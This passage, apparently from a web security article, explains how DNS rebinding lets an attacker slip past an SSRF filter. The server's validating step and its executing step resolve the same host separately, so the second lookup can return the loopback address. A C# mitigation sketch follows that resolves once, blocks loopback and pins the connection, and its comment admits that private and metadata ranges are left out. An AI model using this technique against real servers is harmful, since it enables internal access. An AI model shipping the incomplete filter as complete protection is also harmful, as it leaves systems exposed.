- Consequently, the filtering function on the vulnerable server, when reaching out to the public DNS server to resolve the client-supplied domain name and apply filtering, obtains a "normal" IP address. Upon confirming the safety of the obtained address, it caches it for a very short duration. This cached record quickly becomes obsolete.
- Since the validating function has verified the safety of the obtained address, the request is passed to the executing function. However, due to the insecure configuration of this functionality on the back-end, instead of using the IP obtained by the validating function, the executing function queries the local DNS cache and, failing to find a record for the required host, makes another DNS request, assuming that the result will match what the validating function obtained. Nonetheless, the executing function receives a different IP address, pointing to the server's loopback interface.
- Consequently, when making a request to the local IP address, the server generates a response based on the components of the URI under the attacker's control, and the result of the request is displayed on the client side.
This scenario is presented here as an example and is far from exhaustive. The process of detection and exploitation heavily relies on the code and configurations on the target web server's side.
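On the defensive side, a common pattern is to resolve the hostname exactly once, validate the result, and pin the connection to that address so the executing step cannot trigger a second lookup. A hedged sketch (IPv4 and plain HTTP assumed for brevity; for TLS, the pinning is typically done via SocketsHttpHandler.ConnectCallback so SNI and certificate validation still use the hostname):
using System;
using System.Linq;
using System.Net;
using System.Net.Http;

// Resolve once, validate, then connect to the checked literal IP so the
// TOCTOU window between validation and use disappears.
string host = "user-supplied.example"; // illustrative attacker-controlled input
IPAddress addr = (await Dns.GetHostAddressesAsync(host)).First();

// Reject loopback here; RFC 1918, link-local and metadata ranges omitted for brevity.
if (IPAddress.IsLoopback(addr))
    throw new InvalidOperationException("Blocked address");

// Keep the original hostname in the Host header while dialing the pinned IP.
using var client = new HttpClient();
var req = new HttpRequestMessage(HttpMethod.Get, $"http://{addr}/");
req.Headers.Host = host;
using var resp = await client.SendAsync(req);
Console.WriteLine(resp.StatusCode);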